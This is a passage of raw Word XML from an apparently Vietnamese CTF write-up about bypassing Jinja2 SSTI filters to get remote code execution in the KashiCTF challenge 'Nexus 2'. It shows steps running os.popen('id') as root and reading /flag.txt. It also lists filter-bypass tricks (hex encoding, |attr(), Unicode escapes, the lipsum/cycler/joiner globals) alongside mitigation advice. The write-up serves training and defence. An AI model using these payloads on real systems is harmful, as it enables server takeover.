                <w:color w:val="C9D1D9"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="0"/>
                <w:u w:val="single" w:color="000000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>['os']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&lt;module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'os'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(frozen)&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="555"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="51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6"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5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7"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="FF4757"/>
              </w:rPr>
              <w:t>RCE</w:t>
            </w:r>
            <w:bookmarkEnd w:id="55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58"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>os.popen('id').read()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uid=0(root)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="558"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="51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59"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5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b w:val="true"/>
                <w:color w:val="FF4757"/>
              </w:rPr>
              <w:spacing w:before="144" w:after="157" w:lineRule="auto" w:line="241"/>
              <w:ind w:left="155" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:wordWrap w:val="false"/>
            </w:pPr>
            <w:bookmarkStart w:name="_GoBack" w:id="560"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="FF4757"/>
              </w:rPr>
              <w:t>Get</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="FF4757"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:b w:val="true"/>
                <w:color w:val="FF4757"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5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single" w:sz="3" w:space="0" w:color="30363D"/>
              <w:bottom w:val="single" w:sz="3" w:space="0" w:color="30363D"/>
              <w:right w:val="single" w:sz="3" w:space="0" w:color="30363D"/>
              <w:top w:val="single" w:sz="3" w:space="0" w:color="30363D"/>
            </w:tcBorders>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:spacing w:before="144" w:after="157" w:lineRule="auto" w:line="241"/>
              <w:ind w:left="156" w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:wordWrap w:val="false"/>
            </w:pPr>
            <w:bookmarkStart w:name="_GoBack" w:id="561"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>os.popen('cat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/flag.txt').read()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→</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:color w:val="C9D1D9"/>
              </w:rPr>
              <w:t>FLAG!</w:t>
            </w:r>
            <w:bookmarkEnd w:id="561"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:b w:val="true"/>
          <w:color w:val="00E5FF"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="638"/>
        </w:tabs>
        <w:spacing w:before="656" w:after="364" w:lineRule="auto" w:line="240"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="562"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:b w:val="true"/>
          <w:color w:val="00E5FF"/>
        </w:rPr>
        <w:t>Bài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học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rút</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:b w:val="true"/>
          <w:color w:val="00E5FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:b w:val="true"/>
          <w:color w:val="00E5FF"/>
        </w:rPr>
        <w:t>ra</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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765810</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="13335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="563" name="Image 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60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rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:before="364" w:after="147" w:lineRule="auto" w:line="241"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="462" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="564"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>SSTI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rất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nguy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hiểm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cho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phép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thực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code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tùy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ý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trên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server,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thậm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chí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với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quyền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root</w:t>
      </w:r>
      <w:bookmarkEnd w:id="564"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:before="147" w:after="56" w:lineRule="auto" w:line="337"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="462" w:right="712" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="565"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Blacklist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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pacing w:val="2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không</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="27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đủ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an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toàn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—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hex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encoding,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|attr(),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Unicode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escape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đều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có</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26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thể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bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="565"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:before="56" w:after="147" w:lineRule="auto" w:line="241"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="462" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="566"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Nên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whitelist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approach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thay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blacklist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khi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validate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input</w:t>
      </w:r>
      <w:bookmarkEnd w:id="566"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:before="147" w:after="56" w:lineRule="auto" w:line="337"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="462" w:right="415" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="567"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>Với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Flask/Jinja2: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SandboxedEnvironment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hoặc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tránh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render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input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người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dùng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="64"/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trực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tiếp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vào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template</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="567"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="644"/>
        </w:tabs>
        <w:spacing w:before="56" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="462" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="568"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>lipsum,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cycler,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joiner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là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các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Jinja2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global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ít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bị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filter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hơn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config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hay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:color w:val="C9D1D9"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:bookmarkEnd w:id="568"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="219"/>
        <w:ind w:left="463" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="569"/>
      <w:bookmarkEnd w:id="569"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:lineRule="auto" w:line="219"/>
        <w:ind w:left="463" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="570"/>
      <w:bookmarkEnd w:id="570"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="18" w:lineRule="auto" w:line="219"/>
        <w:ind w:left="463" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="571"/>
      <w:bookmarkEnd w:id="571"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="18" w:after="0" w:lineRule="auto" w:line="241"/>
        <w:ind w:left="182" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="572"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>Write-up: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Nexus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2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(500pts)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|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KashiCTF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|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SSTI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Jinja2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Filter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Bypass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→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57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789305</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-114935</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5981065" cy="13335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="573" name="Image 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62pt;margin-top:-9pt;width:471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545" y="284"/>
                          <a:ext cx="5980301" cy="12700"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="5980301" h="12700">
                              <a:moveTo>
                                <a:pt x="6350" y="6350"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="5973951" y="6350"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="12700" cap="rnd" cmpd="sng">
                          <a:solidFill>
                            <a:srgbClr val="161B22">
                              <a:alpha val="100000"/>
                            </a:srgbClr>
                          </a:solidFill>
                          <a:miter lim="10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5980301,12700"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r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4"/>
      <w:bookmarkEnd w:id="574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5"/>
      <w:bookmarkEnd w:id="575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6"/>
      <w:bookmarkEnd w:id="576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7"/>
      <w:bookmarkEnd w:id="577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8"/>
      <w:bookmarkEnd w:id="578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79"/>
      <w:bookmarkEnd w:id="579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0"/>
      <w:bookmarkEnd w:id="580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1"/>
      <w:bookmarkEnd w:id="581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2"/>
      <w:bookmarkEnd w:id="582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3"/>
      <w:bookmarkEnd w:id="583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4"/>
      <w:bookmarkEnd w:id="584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5"/>
      <w:bookmarkEnd w:id="585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6"/>
      <w:bookmarkEnd w:id="586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7"/>
      <w:bookmarkEnd w:id="587"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0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8"/>
      <w:bookmarkEnd w:id="588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89"/>
      <w:bookmarkEnd w:id="589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0"/>
      <w:bookmarkEnd w:id="590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1"/>
      <w:bookmarkEnd w:id="591"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0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2"/>
      <w:bookmarkEnd w:id="592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3"/>
      <w:bookmarkEnd w:id="593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4"/>
      <w:bookmarkEnd w:id="594"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="0" w:lineRule="auto" w:line="215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5"/>
      <w:bookmarkEnd w:id="595"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="108" w:lineRule="auto" w:line="216"/>
        <w:ind w:left="183" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:wordWrap w:val="false"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="596"/>
      <w:bookmarkEnd w:id="596"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:spacing w:before="108" w:after="0" w:lineRule="auto" w:line="234"/>
        <w:ind w:left="2619" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:wordWrap w:val="false"/>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="597"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>CTF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Write-Up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Nexus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2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2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SSTI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Filter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Bypass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|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Trang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="61"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:color w:val="8B949E"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="597"/>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId21" w:type="default"/>
      <w:footerReference r:id="rId22" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
      <w:pgMar w:right="1071" w:left="1071" w:top="1386" w:bottom="238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704020202020200"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Batang">
    <w:panose1 w:val="02030600000101010100"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="B00002AF" w:usb1="69D77CFB" w:usb2="00000030" w:usb3="00000000" w:csb0="0008009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Lucida Console">
    <w:panose1 w:val="020B0609040504020200"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="8000028F" w:usb1="00001800" w:usb2="00000000" w:usb3="00000000" w:csb0="0000001F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="MS Gothic">
    <w:panose1 w:val="020B0609070205080200"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00002FF" w:usb1="6AC7FDFB" w:usb2="08000012" w:usb3="00000000" w:csb0="0002009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Wingdings 2">
    <w:panose1 w:val="050201020105070707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"/>
    <w:bookmarkEnd w:id="10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92"/>
    <w:bookmarkEnd w:id="92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68"/>
    <w:bookmarkEnd w:id="168"/>
  </w:p>
</w:ftr>
</file>

<file path=word/footer4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239"/>
    <w:bookmarkEnd w:id="239"/>
  </w:p>
</w:ftr>
</file>

<file path=word/footer5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10"/>
    <w:bookmarkEnd w:id="310"/>
  </w:p>
</w:ftr>
</file>

<file path=word/footer6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387"/>
    <w:bookmarkEnd w:id="387"/>
  </w:p>
</w:ftr>
</file>

<file path=word/footer7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462"/>
    <w:bookmarkEnd w:id="462"/>
  </w:p>
</w:ftr>
</file>

<file path=word/footer8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223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532"/>
    <w:bookmarkEnd w:id="532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"/>
    <w:bookmarkEnd w:id="1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2" name="Image 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2493929"/>
                          <ns0:ext cx="1530000" cy="355600"/>
                        </ns0:xfrm>
                        <ns0:custGeom>
                          <ns0:rect l="l" t="t" r="r" b="b"/>
                          <ns0:pathLst>
                            <ns0:path w="1530000" h="355600">
                              <ns0:moveTo>
                                <ns0:pt x="0" y="0"/>
                              </ns0:moveTo>
                              <ns0:lnTo>
                                <ns0:pt x="1530000" y="0"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="1530000" y="355600"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="0" y="3556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0E5FF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2250000" y="2493929"/>
                          <ns0:ext cx="1529999" cy="355600"/>
                        </ns0:xfrm>
                        <ns0:custGeom>
                          <ns0:rect l="l" t="t" r="r" b="b"/>
                          <ns0:pathLst>
                            <ns0:path w="1529999" h="355600">
                              <ns0:moveTo>
                                <ns0:pt x="0" y="0"/>
                              </ns0:moveTo>
                              <ns0:lnTo>
                                <ns0:pt x="1529999" y="0"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="1529999" y="355600"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="0" y="3556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FF475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3780000" y="2493929"/>
                          <ns0:ext cx="1530000" cy="355600"/>
                        </ns0:xfrm>
                        <ns0:custGeom>
                          <ns0:rect l="l" t="t" r="r" b="b"/>
                          <ns0:pathLst>
                            <ns0:path w="1530000" h="355600">
                              <ns0:moveTo>
                                <ns0:pt x="0" y="0"/>
                              </ns0:moveTo>
                              <ns0:lnTo>
                                <ns0:pt x="1530000" y="0"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="1530000" y="355600"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="0" y="3556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D299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5310000" y="2493929"/>
                          <ns0:ext cx="1530000" cy="355600"/>
                        </ns0:xfrm>
                        <ns0:custGeom>
                          <ns0:rect l="l" t="t" r="r" b="b"/>
                          <ns0:pathLst>
                            <ns0:path w="1530000" h="355600">
                              <ns0:moveTo>
                                <ns0:pt x="0" y="0"/>
                              </ns0:moveTo>
                              <ns0:lnTo>
                                <ns0:pt x="1530000" y="0"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="1530000" y="355600"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="0" y="3556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3FB950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96200" y="4246530"/>
                          <ns0:ext cx="5967601" cy="254000"/>
                        </ns0:xfrm>
                        <ns0:custGeom>
                          <ns0:rect l="l" t="t" r="r" b="b"/>
                          <ns0:pathLst>
                            <ns0:path w="5967601" h="254000">
                              <ns0:moveTo>
                                <ns0:pt x="0" y="254000"/>
                              </ns0:moveTo>
                              <ns0:lnTo>
                                <ns0:pt x="5967601" y="254000"/>
                              </ns0:lnTo>
                              <ns0:lnTo>
                                <ns0:pt x="5967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254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3" name="Image 3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"/>
    <w:bookmarkEnd w:id="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9"/>
    <w:bookmarkEnd w:id="9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81"/>
    <w:bookmarkEnd w:id="81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82" name="Image 8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1979930</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>2087115</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="3600001" cy="3449411"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="83" name="Image 83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83" name="B9A0ED50-99D1-47F4-6748-915B397C04B4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3600001" cy="3449411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84" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:156pt;margin-top:164pt;width:283pt;height:27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85" name="Image 85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6"/>
    <w:bookmarkEnd w:id="8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7"/>
    <w:bookmarkEnd w:id="8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8"/>
    <w:bookmarkEnd w:id="8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9"/>
    <w:bookmarkEnd w:id="8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90"/>
    <w:bookmarkEnd w:id="90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91"/>
    <w:bookmarkEnd w:id="91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156"/>
    <w:bookmarkEnd w:id="156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157" name="Image 157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1979930</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>867915</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="3600001" cy="3346040"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="158" name="Image 158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158" name="3FA9AFB1-0B2D-4618-AB08-60B76FC70A11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3600001" cy="3346040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159" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:156pt;margin-top:68pt;width:283pt;height:26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922655</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>7109331</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5714365" cy="1181735"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="160" name="Image 160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73pt;margin-top:560pt;width:450pt;height:9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545" y="510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545" y="1016509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5713601,11811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161" name="Image 161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62"/>
    <w:bookmarkEnd w:id="16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63"/>
    <w:bookmarkEnd w:id="16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64"/>
    <w:bookmarkEnd w:id="16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65"/>
    <w:bookmarkEnd w:id="16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66"/>
    <w:bookmarkEnd w:id="166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167"/>
    <w:bookmarkEnd w:id="167"/>
  </w:p>
</w:hdr>
</file>

<file path=word/header4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227"/>
    <w:bookmarkEnd w:id="227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228" name="Image 228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923200" y="1185829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923200" y="2252629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1619885</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>2836415</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="4320000" cy="2777144"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="229" name="Image 229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229" name="EA48E26F-1F33-4D09-062D-F18B52F2C7CB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4320000" cy="2777144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230" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:128pt;margin-top:223pt;width:340pt;height:21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922655</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6375270</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5714365" cy="2959735"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="231" name="Image 231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73pt;margin-top:502pt;width:450pt;height:23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545" y="573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545" y="2629473"/>
                          <ns0:ext cx="5713601" cy="330200"/>
                        </ns0:xfrm>
                        <ns0:custGeom>
                          <ns0:rect l="l" t="t" r="r" b="b"/>
                          <ns0:pathLst>
                            <ns0:path w="5713601" h="330200">
                              <ns0:moveTo>
                                <ns0:pt x="0" y="330200"/>
                              </ns0:moveTo>
                              <ns0:lnTo>
                                <ns0:pt x="5713601" y="3302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3302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5713601,29591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232" name="Image 23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33"/>
    <w:bookmarkEnd w:id="23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34"/>
    <w:bookmarkEnd w:id="23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35"/>
    <w:bookmarkEnd w:id="23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36"/>
    <w:bookmarkEnd w:id="23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37"/>
    <w:bookmarkEnd w:id="237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238"/>
    <w:bookmarkEnd w:id="238"/>
  </w:p>
</w:hdr>
</file>

<file path=word/header5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298"/>
    <w:bookmarkEnd w:id="298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299" name="Image 299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923200" y="1439829"/>
                          <ns0:ext cx="5713601" cy="165100"/>
                        </ns0:xfrm>
                        <ns0:custGeom>
                          <ns0:rect l="l" t="t" r="r" b="b"/>
                          <ns0:pathLst>
                            <ns0:path w="5713601" h="165100">
                              <ns0:moveTo>
                                <ns0:pt x="0" y="165100"/>
                              </ns0:moveTo>
                              <ns0:lnTo>
                                <ns0:pt x="5713601" y="1651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651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2341115</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5040000" cy="3240000"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="300" name="Image 300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300" name="15FE4F73-9900-4E18-2173-E5BA9A9DB56F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5040000" cy="3240000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301" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:99pt;margin-top:184pt;width:397pt;height:25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922655</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6685785</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5714365" cy="330835"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="302" name="Image 30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73pt;margin-top:526pt;width:450pt;height:26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545" y="516"/>
                        <ns0:ext cx="5713601" cy="330200"/>
                      </ns0:xfrm>
                      <ns0:custGeom>
